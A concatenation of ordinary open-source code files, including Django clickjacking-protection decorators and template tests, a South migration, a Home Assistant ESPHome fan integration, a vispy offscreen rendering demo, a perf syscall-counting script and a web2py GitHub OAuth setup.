self.groupBox.setTitle(kdecore.i18n(_fromUtf8("User Module Folder")))
self.label.setText(kdecore.i18n(_fromUtf8("Any Python modules placed in this folder will be available for import by scripts.")))
self.folderLabel.setText(kdecore.i18n(_fromUtf8("None selected")))
self.browseButton.setText(kdecore.i18n(_fromUtf8("Browse")))
| gpl-3.0 |
blaze33/django | django/views/decorators/clickjacking.py | 550 | 1759 | from functools import wraps
from django.utils.decorators import available_attrs
def xframe_options_deny(view_func):
"""
Modifies a view function so its response has the X-Frame-Options HTTP
header set to 'DENY' as long as the response doesn't already have that
header set.
e.g.
@xframe_options_deny
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
if resp.get('X-Frame-Options', None) is None:
resp['X-Frame-Options'] = 'DENY'
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
def xframe_options_sameorigin(view_func):
"""
Modifies a view function so its response has the X-Frame-Options HTTP
header set to 'SAMEORIGIN' as long as the response doesn't already have
that header set.
e.g.
@xframe_options_sameorigin
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
if resp.get('X-Frame-Options', None) is None:
resp['X-Frame-Options'] = 'SAMEORIGIN'
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
def xframe_options_exempt(view_func):
"""
Modifies a view function by setting a response variable that instructs
XFrameOptionsMiddleware to NOT set the X-Frame-Options HTTP header.
e.g.
@xframe_options_exempt
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
resp.xframe_options_exempt = True
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
| bsd-3-clause |
ojengwa/oh-mainline | mysite/bugsets/migrations/0006_skillset_to_text.py | 15 | 12211 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'AnnotatedBug.skill_list'
db.add_column('bugsets_annotatedbug', 'skill_list', self.gf('django.db.models.fields.CharField')(default='', max_length=500, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'AnnotatedBug.skill_list'
db.delete_column('bugsets_annotatedbug', 'skill_list')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 7, 19, 17, 9, 30, 6153)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 7, 19, 17, 9, 30, 6031)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'bugsets.annotatedbug': {
'Meta': {'object_name': 'AnnotatedBug'},
'assigned_to': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mentor': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']", 'null': 'True', 'blank': 'True'}),
'skill_list': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'skills': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['bugsets.Skill']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'u'", 'max_length': '1'}),
'time_estimate': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200'})
},
'bugsets.bugset': {
'Meta': {'object_name': 'BugSet'},
'bugs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['bugsets.AnnotatedBug']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'bugsets.skill': {
'Meta': {'object_name': 'Skill'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'customs.webresponse': {
'Meta': {'object_name': 'WebResponse'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'response_headers': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'url': ('django.db.models.fields.TextField', [], {})
},
'profile.dataimportattempt': {
'Meta': {'object_name': 'DataImportAttempt'},
'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'web_response': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['customs.WebResponse']", 'null': 'True'})
},
'profile.person': {
'Meta': {'object_name': 'Person'},
'bio': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'blacklisted_repository_committers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profile.RepositoryCommitter']", 'symmetrical': 'False'}),
'contact_blurb': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dont_guess_my_location': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_me_re_projects': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'expand_next_steps': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'irc_nick': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'latitude': ('django.db.models.fields.FloatField', [], {'default': '-37.3049962'}),
'location_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location_display_name': ('django.db.models.fields.CharField', [], {'default': "'Inaccessible Island'", 'max_length': '255', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {'default': '-12.6790445'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}),
'photo_thumbnail': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_20px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_30px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'profile.repositorycommitter': {
'Meta': {'unique_together': "(('project', 'data_import_attempt'),)", 'object_name': 'RepositoryCommitter'},
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"})
},
'search.project': {
'Meta': {'object_name': 'Project'},
'cached_contributor_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'homepage': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'icon_for_profile': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_for_search_result': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_raw': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'logo_contains_name': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'people_who_wanna_help': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects_i_wanna_help'", 'symmetrical': 'False', 'to': "orm['profile.Person']"})
}
}
complete_apps = ['bugsets']
| agpl-3.0 |
katrid/django | tests/template_tests/test_context.py | 166 | 5389 | # -*- coding: utf-8 -*-
from django.http import HttpRequest
from django.template import (
Context, Engine, RequestContext, Template, Variable, VariableDoesNotExist,
)
from django.template.context import RenderContext
from django.test import RequestFactory, SimpleTestCase
class ContextTests(SimpleTestCase):
def test_context(self):
c = Context({"a": 1, "b": "xyzzy"})
self.assertEqual(c["a"], 1)
self.assertEqual(c.push(), {})
c["a"] = 2
self.assertEqual(c["a"], 2)
self.assertEqual(c.get("a"), 2)
self.assertEqual(c.pop(), {"a": 2})
self.assertEqual(c["a"], 1)
self.assertEqual(c.get("foo", 42), 42)
def test_push_context_manager(self):
c = Context({"a": 1})
with c.push():
c['a'] = 2
self.assertEqual(c['a'], 2)
self.assertEqual(c['a'], 1)
with c.push(a=3):
self.assertEqual(c['a'], 3)
self.assertEqual(c['a'], 1)
def test_update_context_manager(self):
c = Context({"a": 1})
with c.update({}):
c['a'] = 2
self.assertEqual(c['a'], 2)
self.assertEqual(c['a'], 1)
with c.update({'a': 3}):
self.assertEqual(c['a'], 3)
self.assertEqual(c['a'], 1)
def test_setdefault(self):
c = Context()
x = c.setdefault('x', 42)
self.assertEqual(x, 42)
self.assertEqual(c['x'], 42)
x = c.setdefault('x', 100)
self.assertEqual(x, 42)
self.assertEqual(c['x'], 42)
def test_resolve_on_context_method(self):
"""
#17778 -- Variable shouldn't resolve RequestContext methods
"""
empty_context = Context()
with self.assertRaises(VariableDoesNotExist):
Variable('no_such_variable').resolve(empty_context)
with self.assertRaises(VariableDoesNotExist):
Variable('new').resolve(empty_context)
self.assertEqual(
Variable('new').resolve(Context({'new': 'foo'})),
'foo',
)
def test_render_context(self):
test_context = RenderContext({'fruit': 'papaya'})
# Test that push() limits access to the topmost dict
test_context.push()
test_context['vegetable'] = 'artichoke'
self.assertEqual(list(test_context), ['vegetable'])
self.assertNotIn('fruit', test_context)
with self.assertRaises(KeyError):
test_context['fruit']
self.assertIsNone(test_context.get('fruit'))
def test_flatten_context(self):
a = Context()
a.update({'a': 2})
a.update({'b': 4})
a.update({'c': 8})
self.assertEqual(a.flatten(), {
'False': False, 'None': None, 'True': True,
'a': 2, 'b': 4, 'c': 8
})
def test_context_comparable(self):
"""
#21765 -- equality comparison should work
"""
test_data = {'x': 'y', 'v': 'z', 'd': {'o': object, 'a': 'b'}}
self.assertEqual(Context(test_data), Context(test_data))
a = Context()
b = Context()
self.assertEqual(a, b)
# update only a
a.update({'a': 1})
self.assertNotEqual(a, b)
# update both to check regression
a.update({'c': 3})
b.update({'c': 3})
self.assertNotEqual(a, b)
# make contexts equals again
b.update({'a': 1})
self.assertEqual(a, b)
def test_copy_request_context_twice(self):
"""
#24273 -- Copy twice shouldn't raise an exception
"""
RequestContext(HttpRequest()).new().new()
class RequestContextTests(SimpleTestCase):
def test_include_only(self):
"""
#15721 -- ``{% include %}`` and ``RequestContext`` should work
together.
"""
engine = Engine(loaders=[
('django.template.loaders.locmem.Loader', {
'child': '{{ var|default:"none" }}',
}),
])
request = RequestFactory().get('/')
ctx = RequestContext(request, {'var': 'parent'})
self.assertEqual(engine.from_string('{% include "child" %}').render(ctx), 'parent')
self.assertEqual(engine.from_string('{% include "child" only %}').render(ctx), 'none')
def test_stack_size(self):
"""
#7116 -- Optimize RequetsContext construction
"""
request = RequestFactory().get('/')
ctx = RequestContext(request, {})
# The stack should now contain 3 items:
# [builtins, supplied context, context processor, empty dict]
self.assertEqual(len(ctx.dicts), 4)
def test_context_comparable(self):
# Create an engine without any context processors.
test_data = {'x': 'y', 'v': 'z', 'd': {'o': object, 'a': 'b'}}
# test comparing RequestContext to prevent problems if somebody
# adds __eq__ in the future
request = RequestFactory().get('/')
self.assertEqual(
RequestContext(request, dict_=test_data),
RequestContext(request, dict_=test_data),
)
def test_modify_context_and_render(self):
template = Template('{{ foo }}')
request = RequestFactory().get('/')
context = RequestContext(request, {})
context['foo'] = 'foo'
self.assertEqual(template.render(context), 'foo')
| bsd-3-clause |
fbradyirl/home-assistant | homeassistant/components/esphome/fan.py | 2 | 3689 | """Support for ESPHome fans."""
import logging
from typing import List, Optional
from aioesphomeapi import FanInfo, FanSpeed, FanState
from homeassistant.components.fan import (
SPEED_HIGH,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_OFF,
SUPPORT_OSCILLATE,
SUPPORT_SET_SPEED,
FanEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers.typing import HomeAssistantType
from . import (
EsphomeEntity,
esphome_map_enum,
esphome_state_property,
platform_async_setup_entry,
)
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistantType, entry: ConfigEntry, async_add_entities
) -> None:
"""Set up ESPHome fans based on a config entry."""
await platform_async_setup_entry(
hass,
entry,
async_add_entities,
component_key="fan",
info_type=FanInfo,
entity_type=EsphomeFan,
state_type=FanState,
)
@esphome_map_enum
def _fan_speeds():
return {
FanSpeed.LOW: SPEED_LOW,
FanSpeed.MEDIUM: SPEED_MEDIUM,
FanSpeed.HIGH: SPEED_HIGH,
}
class EsphomeFan(EsphomeEntity, FanEntity):
"""A fan implementation for ESPHome."""
@property
def _static_info(self) -> FanInfo:
return super()._static_info
@property
def _state(self) -> Optional[FanState]:
return super()._state
async def async_set_speed(self, speed: str) -> None:
"""Set the speed of the fan."""
if speed == SPEED_OFF:
await self.async_turn_off()
return
await self._client.fan_command(
self._static_info.key, speed=_fan_speeds.from_hass(speed)
)
async def async_turn_on(self, speed: Optional[str] = None, **kwargs) -> None:
"""Turn on the fan."""
if speed == SPEED_OFF:
await self.async_turn_off()
return
data = {"key": self._static_info.key, "state": True}
if speed is not None:
data["speed"] = _fan_speeds.from_hass(speed)
await self._client.fan_command(**data)
# pylint: disable=arguments-differ
async def async_turn_off(self, **kwargs) -> None:
"""Turn off the fan."""
await self._client.fan_command(key=self._static_info.key, state=False)
async def async_oscillate(self, oscillating: bool) -> None:
"""Oscillate the fan."""
await self._client.fan_command(
key=self._static_info.key, oscillating=oscillating
)
@esphome_state_property
def is_on(self) -> Optional[bool]:
"""Return true if the entity is on."""
return self._state.state
@esphome_state_property
def speed(self) -> Optional[str]:
"""Return the current speed."""
if not self._static_info.supports_speed:
return None
return _fan_speeds.from_esphome(self._state.speed)
@esphome_state_property
def oscillating(self) -> None:
"""Return the oscillation state."""
if not self._static_info.supports_oscillation:
return None
return self._state.oscillating
@property
def speed_list(self) -> Optional[List[str]]:
"""Get the list of available speeds."""
if not self._static_info.supports_speed:
return None
return [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
@property
def supported_features(self) -> int:
"""Flag supported features."""
flags = 0
if self._static_info.supports_oscillation:
flags |= SUPPORT_OSCILLATE
if self._static_info.supports_speed:
flags |= SUPPORT_SET_SPEED
return flags
| apache-2.0 |
inclement/vispy | examples/demo/gloo/offscreen.py | 18 | 4206 | # -*- coding: utf-8 -*-
# vispy: testskip
# -----------------------------------------------------------------------------
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
"""
Demonstrate how to do offscreen rendering.
Possible use cases:
* GPGPU without CUDA or OpenCL
* creation of scripted animations
* remote and Web backends
The method consists of:
1. Not showing the canvas (show=False).
2. Rendering to an FBO.
3. Manually triggering a rendering pass with self.update().
4. Retrieving the scene with _screenshot().
5. Closing the app after the first rendering pass (if that's the intended
scenario).
"""
from vispy import gloo
from vispy import app
from vispy.util.ptime import time
from vispy.gloo.util import _screenshot
# WARNING: doesn't work with Qt4 (update() does not call on_draw()??)
app.use_app('glfw')
vertex = """
attribute vec2 position;
void main()
{
gl_Position = vec4(position, 0, 1.0);
}
"""
fragment = """
uniform vec2 resolution;
uniform vec2 center;
uniform float scale;
uniform int iter;
// Jet color scheme
vec4 color_scheme(float x) {
vec3 a, b;
float c;
if (x < 0.34) {
a = vec3(0, 0, 0.5);
b = vec3(0, 0.8, 0.95);
c = (x - 0.0) / (0.34 - 0.0);
} else if (x < 0.64) {
a = vec3(0, 0.8, 0.95);
b = vec3(0.85, 1, 0.04);
c = (x - 0.34) / (0.64 - 0.34);
} else if (x < 0.89) {
a = vec3(0.85, 1, 0.04);
b = vec3(0.96, 0.7, 0);
c = (x - 0.64) / (0.89 - 0.64);
} else {
a = vec3(0.96, 0.7, 0);
b = vec3(0.5, 0, 0);
c = (x - 0.89) / (1.0 - 0.89);
}
return vec4(mix(a, b, c), 1.0);
}
void main() {
vec2 z, c;
// Recover coordinates from pixel coordinates
c.x = (gl_FragCoord.x / resolution.x - 0.5) * scale + center.x;
c.y = (gl_FragCoord.y / resolution.y - 0.5) * scale + center.y;
// Main Mandelbrot computation
int i;
z = c;
for(i = 0; i < iter; i++) {
float x = (z.x * z.x - z.y * z.y) + c.x;
float y = (z.y * z.x + z.x * z.y) + c.y;
if((x * x + y * y) > 4.0) break;
z.x = x;
z.y = y;
}
// Convert iterations to color
float color = 1.0 - float(i) / float(iter);
gl_FragColor = color_scheme(color);
}
"""
class Canvas(app.Canvas):
def __init__(self, size=(600, 600)):
# We hide the canvas upon creation.
app.Canvas.__init__(self, show=False, size=size)
self._t0 = time()
# Texture where we render the scene.
self._rendertex = gloo.Texture2D(shape=self.size + (4,))
# FBO.
self._fbo = gloo.FrameBuffer(self._rendertex,
gloo.RenderBuffer(self.size))
# Regular program that will be rendered to the FBO.
self.program = gloo.Program(vertex, fragment)
self.program["position"] = [(-1, -1), (-1, 1), (1, 1),
(-1, -1), (1, 1), (1, -1)]
self.program["scale"] = 3
self.program["center"] = [-0.5, 0]
self.program["iter"] = 300
self.program['resolution'] = self.size
# We manually draw the hidden canvas.
self.update()
def on_draw(self, event):
# Render in the FBO.
with self._fbo:
gloo.clear('black')
gloo.set_viewport(0, 0, *self.size)
self.program.draw()
# Retrieve the contents of the FBO texture.
self.im = _screenshot((0, 0, self.size[0], self.size[1]))
self._time = time() - self._t0
# Immediately exit the application.
app.quit()
if __name__ == '__main__':
c = Canvas()
size = c.size
app.run()
# The rendering is done, we get the rendering output (4D NumPy array)
render = c.im
print('Finished in %.1fms.' % (c._time*1e3))
# Now, we display this image with matplotlib to check.
import matplotlib.pyplot as plt
plt.figure(figsize=(size[0]/100., size[1]/100.), dpi=100)
plt.imshow(render, interpolation='none')
plt.show()
| bsd-3-clause |
DutchDanny/SensationXL-ICS | tools/perf/scripts/python/syscall-counts-by-pid.py | 11180 | 1927 | # system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts-by-pid.py [comm]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
try:
syscalls[common_comm][common_pid][id] += 1
except TypeError:
syscalls[common_comm][common_pid][id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events by comm/pid:\n\n",
print "%-40s %10s\n" % ("comm [pid]/syscalls", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id, val in sorted(syscalls[comm][pid].iteritems(), \
key = lambda(k, v): (v, k), reverse = True):
print " %-38s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
INBio/ala-install | ansible/roles/web2pyApps/files/db.py | 5 | 11481 | # -*- coding: utf-8 -*-
from pprint import pprint
import sys
import os
from ConfigParser import SafeConfigParser
import urllib2
import json
conf = SafeConfigParser({})
try:
if os.path.isfile("applications/%s/private/localconfig" % request.application):
conf.read("applications/%s/private/localconfig" % request.application)
else:
conf.read("applications/%s/private/config" % request.application)
except:
pass #@TEMP probably should log this event...
# add our GitHub client secret from a separate file (kept out of source repo)
if os.path.isfile("applications/%s/private/GITHUB_CLIENT_SECRET" % request.application):
GITHUB_CLIENT_SECRET = open("applications/%s/private/GITHUB_CLIENT_SECRET" % request.application).read().strip()
conf.set("apis", "github_client_secret", GITHUB_CLIENT_SECRET)
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()
#if not request.env.web2py_runtime_gae:
## if NOT running on Google App Engine use SQLite or other DB
db = DAL('sqlite://storage.sqlite',folder='applications/curator/databases',pool_size=1,check_reserved=['all'])
#else:
## connect to Google BigTable (optional 'google:datastore://namespace')
#db = DAL('google:datastore')
## store sessions and tickets there
#session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db)
crud, service, plugins = Crud(db), Service(), PluginManager()
#
# Simple storage for study supporting files. These are stored temporary,
# pending deposition in Dryad or another permanent repository.
#
# I'm adapting a recipe for using web2py with the jQuery-File-Upload plugin:
# http://in10min.blogspot.com/2013/04/web2py-implement-multiple-files-upload.html
#
SupportingFiles = db.define_table('supporting_files',
Field('doc', 'upload', autodelete=True),
#Field('thumb', 'upload', autodelete=True),
#Field('sizeFile', 'float'),
#Field('sessionId', 'string'),)
Field('file_size', 'float'),
Field('study_id', 'string'),)
#from smarthumb import SMARTHUMB
#box = (200, 200)
#SupportingFiles.thumb.compute = lambda row: SMARTHUMB(row.doc, box)
#
# OAuth2 for Github (API v3), based on the FB sample provided in gluon/contrib/login_methods/oauth20_account.py
#
# You need to override the get_user method to match your auth provider needs.
# define the auth_table before call to auth.define_tables()
auth_table = db.define_table(
auth.settings.table_user_name,
Field('name', length=256, default=""), # "Charles Darwin"
Field('email', length=128, default=""), # "[email protected]"
Field('github_login', length=128, default=""), # "chuckd" [Github calls this 'login']
Field('github_url', length=256, default=""), # "https://github.com/chuckd" [Github calls this 'html_url']
Field('avatar_url', length=256, default=""), # "http://0.gravatar.com/avatar/805...9689b.png"
#Field('password', 'password', length=256, readable=False, label='Password'),
Field('github_auth_token', length=128, default= "", writable=False, readable=False),
## Some fields are expected by web2py, so repeat some values above..?
Field('first_name', length=128, default=""),
Field('last_name', length=128, default=""),
Field('username', length=128, default="", ), # unique=True not allowed in sqlite3
Field('password', 'password', length=256, readable=False, label='Password'),
Field('registration_key', length=128, default= "", writable=False, readable=False),
)
# is there another 'auth_token' field here already?
auth_table.github_login.requires = IS_NOT_IN_DB(db, auth_table.github_login)
auth.define_tables()
# OR auth.define_tables(username=False, signature=False)
# see https://code.google.com/p/web2py/issues/detail?id=1260
# Looking for your app's client ID and secret in {app}/private/config
try:
CLIENT_ID = conf.get("apis", "github_client_id")
CLIENT_SECRET = conf.get("apis", "github_client_secret")
REDIRECT_URI = conf.get("apis", "github_redirect_uri")
except:
CLIENT_ID = "CLIENT_ID_NOT_FOUND"
CLIENT_SECRET = "CLIENT_SECRET_NOT_FOUND"
REDIRECT_URI = "REDIRECT_URI_NOT_FOUND"
AUTH_URL="http://..."
TOKEN_URL="http://..."
from gluon import current
from gluon.contrib.login_methods.oauth20_account import OAuthAccount
class GitHubAccount(OAuthAccount):
'''OAuth impl for GitHub'''
# http://developer.github.com/v3/oauth/
AUTH_URL="https://github.com/login/oauth/authorize"
TOKEN_URL="https://github.com/login/oauth/access_token"
def __init__(self):
OAuthAccount.__init__(self,
g=globals(),
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
auth_url=self.AUTH_URL,
token_url=self.TOKEN_URL,
redirect_uri=REDIRECT_URI,
state=os.urandom(16).encode('hex'),
# random string to detect cross-site request forgery
scope='public_repo') # add ',repo' if including private repos
# adding session here, since older OAuthAccount doesn't seem to have it.. :-/
self.session = globals()['session']
def get_user(self):
'''Returns the user using the GitHub User API.'''
##sys.stderr.write('get_user STARTING...\n')
access_token = self.accessToken()
if not access_token:
##sys.stderr.write('get_user NO TOKEN FOUND\n')
return None
##sys.stderr.write('get_user FOUND access_token:\n')
##pprint(access_token)
##sys.stderr.write('> get_user, finishing with this CURRENT.session.token:\n')
##pprint(current.session.token)
##sys.stderr.write('> get_user, trying SELF.session.token:\n')
##pprint(self.session.token)
##sys.stderr.write('> what about just session.token?\n')
##pprint(session.token)
# fetch full user info from GitHub, to add/update user data
user_request = urllib2.Request("https://api.github.com/user", headers={"Authorization" : ("token %s" % access_token)})
data = urllib2.urlopen(user_request).read()
user_json = {}
try:
user_json = json.loads(data)
except Exception, e:
raise Exception("Cannot parse oauth server response %s %s" % (data, e))
return None
##pprint('----------- user_json ----------')
##pprint(user_json)
##pprint('----------- auth_user_fields ----------')
# remap to our chosen auth_user fields
auth_user_fields = dict(name = user_json.get('name', user_json['login']),
email = user_json.get('email', 'EMAIL_NOT_PROVIDED'),
github_login = user_json['login'],
registration_id = user_json['login'],
# required? see https://groups.google.com/forum/#!topic/web2py/yd4_yExPwXg/discussion
github_url = user_json['html_url'],
